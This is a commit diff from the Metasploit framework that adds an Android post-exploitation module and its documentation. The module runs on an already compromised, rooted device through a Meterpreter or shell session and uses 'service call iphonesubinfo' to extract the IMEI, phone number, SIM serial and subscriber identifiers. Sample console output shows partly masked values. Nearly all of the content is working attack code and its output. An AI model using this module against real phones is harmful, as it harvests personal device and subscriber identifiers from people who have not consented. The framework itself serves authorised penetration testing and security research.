Land #9964, android post module to extract subscriber info

documentation/modules/post/android/gather/sub_info.md

@@ -0,0 +1,99 @@
+## Vulnerable Application
+
+  This post-exploitation module will extract subscriber information
+  from the target device using  call service service call iphonesubinfo <transaction_code>.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get meterpreter session
+  3. Do: `use android/gather/sub_info`
+  4. Do: `set SESSION <session id>`
+  5. Do: `run`
+  6. You should be able to see the extracted subsriber information.
+
+## Options
+
+  - **SESSION** - The session to run the module on.
+
+## Extracted data
+
+  - subscribe information
+
+## Example Scenario
+
+
+  ```
+msf5 exploit(multi/handler) > use post/android/gather/sub_info
+msf5 post(android/gather/sub_info) > set session 1
+session => 1
+msf5 post(android/gather/sub_info) > run
+
+[!] SESSION may not be compatible with this module.
+[*] using code : 1
+[*] using code : 2
+[*] using code : 3
+[*] using code : 4
+[*] using code : 5
+[*] using code : 6
+[*] using code : 7
+[*] using code : 8
+[*] using code : 9
+[*] using code : 10
+[*] using code : 11
+[*] using code : 12
+[*] using code : 13
+[*] using code : 14
+[*] using code : 15
+[*] using code : 16
+[*] using code : 17
+[*] using code : 18
+[*] using code : 19
+[*] using code : 20
+[*] using code : 21
+[*] using code : 22
+[*] using code : 23
+[*] using code : 24
+[*] using code : 25
+[*] using code : 26
+[*] using code : 27
+[*] using code : 28
+[*] using code : 29
+Subscriber info
+===============
+
+ transaction code                      value
+ ----------------                      -----
+ CompleteVoiceMailNumber
+ CompleteVoiceMailNumberForSubscriber
+ DeviceId                              86928xxxxxxxxxx
+ DeviceIdForSubscriber
+ DeviceSvn                             8692890262xxxxx
+ GroupIdLevel1                         4042772534xxxxx
+ GroupIdLevel1ForSubscriber            4042772534xxxxx
+ IccSerialNumber                       ff
+ IccSerialNumberForSubscriber          ff
+ IccSimChallengeResponse
+ ImeiForSubscriber                     8692890xxxxxxxx
+ IsimChallengeResponse
+ IsimDomain                            Voicemail
+ IsimImpi                              Voicemail
+ IsimImpu
+ IsimIst
+ IsimPcscf
+ Line1AlphaTag
+ Line1AlphaTagForSubscriber
+ Line1Number                           899127217xxxxxxxxxx
+ Line1NumberForSubscriber              899127217xxxxxxxxxx
+ Msisdn
+ MsisdnForSubscriber
+ SubscriberId                          01
+ SubscriberIdForSubscriber             01
+ VoiceMailAlphaTag
+ VoiceMailAlphaTagForSubscriber
+ VoiceMailNumber
+ VoiceMailNumberForSubscriber
+
+[*] Post module execution completed
+msf5 post(android/gather/sub_info) >
+  ```

modules/post/android/sub_info.rb

@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::Common
+  include Msf::Post::Android::Priv
+  include Msf::Post::Android::System
+
+  def initialize(info={})
+    super( update_info( info, {
+        'Name'          => "extracts subscriber info from target device",
+        'Description'   => %q{
+            This module displays the subscriber info stored on the target phone.
+            It uses call service to get values of each transaction code like imei etc.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => ['Auxilus'],
+        'SessionTypes'  => [ 'meterpreter', 'shell' ],
+        'Platform'       => 'android',
+      }
+    ))
+  end
+
+  def run
+    unless is_root?
+      print_error("This module requires root permissions.")
+      return
+    end
+
+    @transaction_codes ||= [
+      'DeviceId',
+      'DeviceIdForSubscriber',
+      'ImeiForSubscriber',
+      'DeviceSvn',
+      'SubscriberId',
+      'SubscriberIdForSubscriber',
+      'GroupIdLevel1',
+      'GroupIdLevel1ForSubscriber',
+      'IccSerialNumber',
+      'IccSerialNumberForSubscriber',
+      'Line1Number',
+      'Line1NumberForSubscriber',
+      'Line1AlphaTag',
+      'Line1AlphaTagForSubscriber',
+      'Msisdn',
+      'MsisdnForSubscriber',
+      'VoiceMailNumber',
+      'VoiceMailNumberForSubscriber',
+      'CompleteVoiceMailNumber',
+      'CompleteVoiceMailNumberForSubscriber',
+      'VoiceMailAlphaTag',
+      'VoiceMailAlphaTagForSubscriber',
+      'IsimImpi',
+      'IsimDomain',
+      'IsimImpu',
+      'IsimIst',
+      'IsimPcscf',
+      'IsimChallengeResponse',
+      'IccSimChallengeResponse'
+    ]
+    values ||= []
+    arr ||= []
+    for code in 1..@transaction_codes.length do
+      print_status("using code : #{code}")
+      cmd = "service call iphonesubinfo #{code}"
+      block = cmd_exec(cmd)
+      value,tc = get_val(block, code)
+      arr << [tc, value]
+    end
+
+    tc_tbl = Rex::Text::Table.new(
+      'Header'  => 'Subscriber info',
+      'Indent'  => 1,
+      'Columns' => ['transaction code', 'value']
+    )
+
+    arr.each do |a|
+      tc_tbl << [
+        a[0],     #  TRANSACTION CODE
+        a[1]      #  value
+      ]
+    end
+    print_line(tc_tbl.to_s)
+  end
+
+  def get_val(data, code)
+    parsed = data.gsub(/Parcel/, '')
+    string = ''
+    100.times do |i|
+      next if i % 2 == 0
+      str = parsed.split("'")[i]
+      break if str.nil?
+      string += str
+    end
+    v = ''
+    string.split(".").each do |chr|
+      next if chr.nil? or chr == "\n"
+      v += chr
+    end
+    return v,@transaction_codes[code-1]
+  end
+end